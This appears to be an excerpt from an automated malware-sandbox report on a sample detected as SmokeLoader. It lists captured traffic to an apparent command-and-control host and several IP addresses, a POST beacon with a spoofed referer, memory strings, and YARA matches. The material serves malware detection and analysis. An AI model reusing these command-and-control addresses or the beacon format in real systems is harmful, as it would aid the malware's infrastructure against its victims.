                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.408469894.000001C13D3AE000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.408469894.000001C13D3AE000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cosjvii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49919 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49927 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49938 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
